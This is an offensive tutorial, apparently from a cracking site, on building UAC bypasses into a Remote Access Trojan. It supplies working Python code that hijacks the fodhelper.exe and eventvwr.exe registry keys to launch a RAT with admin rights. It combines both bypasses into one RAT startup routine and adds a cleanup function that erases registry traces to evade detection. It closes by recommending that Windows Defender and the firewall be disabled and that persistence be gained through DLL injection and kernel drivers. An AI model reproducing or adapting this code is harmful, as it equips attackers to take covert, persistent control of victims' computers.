Leveraging UAC Bypass for Privilege Escalation in RATs
User Account Control (UAC) in Windows is a security feature designed to prevent unauthorized changes to the system by requiring administrative privileges for certain operations. For attackers building a Remote Access Trojan (RAT), bypassing UAC is crucial for gaining full system control, allowing the RAT to run with elevated privileges, install persistent components, and manipulate critical system settings. Fortunately, Windows is full of exploitable binaries that allow attackers to bypass UAC and escalate privileges without user consent.
In this guide, we’ll explore how to exploit built-in Windows binaries like fodhelper.exe and eventvwr.exe to achieve UAC bypass and privilege escalation, integrating these techniques directly into a RAT for seamless execution.
Step 1: Understanding UAC Bypass Mechanisms
UAC operates by elevating the privilege level of processes that require administrative access. However, certain trusted Windows binaries are automatically allowed to bypass UAC due to their elevated permissions. These binaries can be hijacked or exploited to execute malicious code with admin rights, completely bypassing UAC prompts.
The key to bypassing UAC is to exploit "auto-elevate" features in these trusted binaries to execute our RAT with full administrative privileges without alerting the user.
Step 2: Exploiting fodhelper.exe for UAC Bypass
fodhelper.exe is a legitimate Windows binary located in C:\Windows\System32\. It's used for managing optional features in Windows 10 and automatically runs with elevated privileges, making it a prime target for UAC bypass.
How the Attack Works:
The fodhelper.exe executable looks for specific registry keys to determine configuration settings. By hijacking these registry entries and pointing them to malicious code (i.e., our RAT), we can trick fodhelper.exe into launching the RAT with admin privileges.
Registry Modification for UAC Bypass:
Target Registry Key:
The target key for hijacking fodhelper.exe is:
HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
This key dictates what is executed when fodhelper.exe runs. By changing the default value to point to our RAT executable, we can force it to run our RAT with elevated privileges.
Python Code for fodhelper.exe UAC Bypass:
import os
import ctypes
import winreg as reg
def fodhelper_uac_bypass(rat_path):
# Registry key path for fodhelper.exe UAC bypass
reg_path = r"Software\Classes\ms-settings\shell\open\command"
# Open the registry key for modification
key = reg.OpenKey(reg.HKEY_CURRENT_USER, reg_path, 0, reg.KEY_SET_VALUE)
# Set the default value to the path of the RAT executable
reg.SetValueEx(key, None, 0, reg.REG_SZ, rat_path)
# Set IsolatedCommand to the same path
reg.SetValueEx(key, "IsolatedCommand", 0, reg.REG_SZ, rat_path)
# Close the registry key
reg.CloseKey(key)
# Execute fodhelper.exe to trigger the UAC bypass
ctypes.windll.shell32.ShellExecuteW(None, "open", "fodhelper.exe", None, None, 1)
# Path to your RAT executable
rat_path = "C:\\path\\to\\rat.exe"
fodhelper_uac_bypass(rat_path)
Execution:
- The code modifies the registry to point fodhelper.exe to your RAT's executable path.
- Once fodhelper.exe is executed, it runs the RAT as an administrator without triggering a UAC prompt.
Step 3: Exploiting eventvwr.exe for UAC Bypass
Another effective UAC bypass technique involves abusing eventvwr.exe, the Event Viewer executable. eventvwr.exe is designed to open mmc.exe (Microsoft Management Console), which looks up registry keys for determining the file paths of executables. By hijacking these registry keys, you can make eventvwr.exe launch your RAT with elevated privileges.
How the Attack Works:
- eventvwr.exe launches mmc.exe, which reads from the registry to determine the command to execute.
- By manipulating the registry key that defines the path of mmc.exe, we can redirect it to our RAT executable.
Registry Key to Target:
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
This key specifies what mmc.exe should execute when called by eventvwr.exe. By modifying this key, we can execute arbitrary code with elevated privileges.
Python Code for eventvwr.exe UAC Bypass:
import os
import ctypes
import winreg as reg
def eventvwr_uac_bypass(rat_path):
# Registry key path for eventvwr.exe UAC bypass
reg_path = r"Software\Classes\mscfile\shell\open\command"
# Open the registry key for modification
key = reg.OpenKey(reg.HKEY_CURRENT_USER, reg_path, 0, reg.KEY_SET_VALUE)
# Set the default value to the RAT executable path
reg.SetValueEx(key, None, 0, reg.REG_SZ, rat_path)
# Close the registry key
reg.CloseKey(key)
# Execute eventvwr.exe to trigger the UAC bypass
ctypes.windll.shell32.ShellExecuteW(None, "open", "eventvwr.exe", None, None, 1)
# Path to your RAT executable
rat_path = "C:\\path\\to\\rat.exe"
eventvwr_uac_bypass(rat_path)
Execution:
- The code modifies the registry so that mmc.exe, triggered by eventvwr.exe, points to the RAT executable.
- eventvwr.exe is executed, running the RAT with full administrative privileges without triggering UAC.
Step 4: Integrating UAC Bypass into the RAT for Seamless Privilege Escalation
To fully integrate the UAC bypass techniques into your RAT, you can incorporate both the fodhelper.exe and eventvwr.exe methods as part of the RAT’s initialization sequence. This ensures that upon execution, the RAT will escalate its privileges automatically.
Integrating Both Methods:
import os
import ctypes
import winreg as reg
def fodhelper_uac_bypass(rat_path):
reg_path = r"Software\Classes\ms-settings\shell\open\command"
key = reg.OpenKey(reg.HKEY_CURRENT_USER, reg_path, 0, reg.KEY_SET_VALUE)
reg.SetValueEx(key, None, 0, reg.REG_SZ, rat_path)
reg.SetValueEx(key, "IsolatedCommand", 0, reg.REG_SZ, rat_path)
reg.CloseKey(key)
ctypes.windll.shell32.ShellExecuteW(None, "open", "fodhelper.exe", None, None, 1)
def eventvwr_uac_bypass(rat_path):
reg_path = r"Software\Classes\mscfile\shell\open\command"
key = reg.OpenKey(reg.HKEY_CURRENT_USER, reg_path, 0, reg.KEY_SET_VALUE)
reg.SetValueEx(key, None, 0, reg.REG_SZ, rat_path)
reg.CloseKey(key)
ctypes.windll.shell32.ShellExecuteW(None, "open", "eventvwr.exe", None, None, 1)
def main():
# Path to your RAT executable
rat_path = "C:\\path\\to\\rat.exe"
# Attempt fodhelper.exe UAC bypass first
fodhelper_uac_bypass(rat_path)
# If fodhelper fails, fallback to eventvwr.exe UAC bypass
eventvwr_uac_bypass(rat_path)
if __name__ == "__main__":
main()
This integrated code attempts both the fodhelper.exe and eventvwr.exe UAC bypass techniques. If one method fails, the RAT will fall back to the other, increasing the likelihood of successful privilege escalation.
Step 5: Stealth Considerations
Since UAC bypass methods involve modifying the Windows registry, you’ll want to clean up your tracks after privilege escalation to avoid detection. You can delete the registry keys used for the bypass once your RAT has successfully escalated privileges.
Registry Clean-Up Code:
def clean_registry():
# Clean up fodhelper.exe registry keys
try:
reg.DeleteKey(reg.HKEY_CURRENT_USER, r"Software\Classes\ms-settings\shell\open\command")
except FileNotFoundError:
pass
# Clean up eventvwr.exe registry keys
try:
reg.DeleteKey(reg.HKEY_CURRENT_USER, r"Software\Classes\mscfile\shell\open\command")
except FileNotFoundError:
pass
Call clean_registry() after the RAT has escalated privileges to remove any trace of registry modifications.
Step 6: Going Beyond UAC Bypass
Once your RAT has escalated privileges, it has full control over the system. You can use this elevated access to:
Install kernel-level drivers for deeper system control.
Disable security features like Windows Defender, Firewall, or UAC itself.
Establish deeper persistence by
embedding the RAT in critical system services or leveraging DLL injection into system processes like explorer.exe or svchost.exe.
Conclusion
By exploiting weak UAC mechanisms through fodhelper.exe and eventvwr.exe, attackers can escalate privileges with ease, allowing their RAT to operate with full administrative rights. These techniques are highly effective and can be integrated seamlessly into any RAT to ensure persistence, stealth, and long-term control of the target system.
Support Crack-Vault and help us keep providing free tools. Every donation counts!
(BTC) Address: bc1qhhva8uplmkaa3kkwxnux9t3y6l6kmhnwqzktzn
